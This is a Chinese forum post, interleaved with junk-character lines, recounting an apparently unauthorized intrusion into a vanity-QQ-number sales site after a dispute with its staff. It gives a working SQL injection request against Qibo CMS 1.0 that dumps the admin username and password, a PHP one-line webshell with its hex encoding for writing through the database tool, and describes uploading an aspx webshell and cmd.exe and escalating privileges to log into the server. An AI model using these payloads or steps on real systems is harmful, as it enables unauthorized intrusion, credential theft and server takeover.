|
. c* }5 V# b& Y
. }# m& H& D- l
5 A, y$ ]8 M E
8 L4 J" k( m% y7 e% Z: Z 一、踩点寻找漏洞
* ^& }# _0 M+ A: p, ?2 u; w$ Y闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
* E2 U1 j2 [/ w* S) a
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
% g a* }: f) i: t% T" {* s
先注册一个用户,记住注册时候的邮箱以uid号,
5 v# N! P' i8 }/ M
; d @. _" S/ v* B7 w& j! B" f* t
" B% t: D. [3 D7 R. i0 J: X然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
& a2 l- O. S! z9 {6 Z) V8 T+ D# H
5 {. G9 C: {% \8 c8 F# X( r7 Z ^truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
2 `' w3 n0 P0 ~ Z: d: X3 R) @1 c, W这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
7 l7 O- U: N& U+ V; k- D5 v
% p L) U6 s, l, W7 T# J, C4 _6 ~, K7 m
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
& _) K7 o# Z6 R* H' x |# q' B
. W/ D3 ~2 j- Q1 p5 G
% t% V* @6 o# l' `$ x解密进后台如图:
6 M9 r0 a, r- C3 g# e& O- ]; u
. f3 d; m+ D% K
7 \( b7 E# `/ w5 d
) L9 |; V* N! K0 ]: x
二、后台getwebshell
) z+ r8 C# Z `) K0 t9 |6 q% A
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
" l# Z9 P) }9 P) Q! ^& ]# D
+ |7 Y. A) F* I* P
8 M( n! N0 t" I C% q
3 T- l6 Q- }% g4 X; h+ O0 q3 d2 x; \
然后点确定,添加提示
1 m( V0 G4 k+ c% k- Z+ F- ^, X
$ H: E, O0 L+ O7 s
/ ] F5 B2 R0 D9 ~0 g4 r
. g+ N3 P+ o$ h" N) _5 n4 P4 i
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
- n0 k6 S# w+ g( }8 p
$ _& D* g* T% X3 _" b6 _% V
+ _2 @ v+ W$ ?
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
1 V: `1 Z9 r; f3 @" k G如图:
/ X4 {' q) t0 B1 _, M7 a: ]6 b+ ?
( `4 Z8 l* Z1 K* X# M4 u' P2 x
3 k7 b9 j; |2 N$ \ q4 l J5 Y3 H
% K8 s/ m+ m2 N) j之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
5 r: I1 g( }4 B. |
6 }# g3 g3 H: s- N2 p, n
* W4 ]6 s/ m' M; n7 k- Z8 K
* ?- f" a5 z5 \! q1 O三、提权进服务器
* f& ]! z- L" A' ]0 U9 T: n
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
* t) A0 j7 i5 `% @) ]' c, [" y
U# u# t) J c# q$ L C2 U% M
0 N7 V! `! p1 d, z, j
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
1 C/ K' B5 }% h6 N+ h+ F( g; s' k2 F
/ V7 g; y, b6 w( t8 j8 p% b
+ k2 f* p- ]# G( R5 q& X0 y然后登陆服务器如图:
& T0 X* M2 P6 ~3 _* I
/ K6 l0 ?. x% S. z+ [
) c+ K1 G' [# H; K, b
; }. Q W, m& B: H
7 Z( `" w. m+ W1 ?" ]
2 w0 p7 ]6 j# ^* ]5 z. W! I9 b难怪普通刀连接不上,原来是有狗。
G+ @3 a% F6 ^3 ?
2 D' X/ |+ F3 D7 o, p
7 n: _7 a0 U, J/ Z3 z# f3 ~% q+ o! k
% b y" E! ?5 |) g. d6 N
% f$ ?1 K8 D" H
* M4 h) t8 n/ f- {( @% e2 q
/ s5 u5 l6 ^7 w/ C' U8 W2 A: \$ X6 \
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对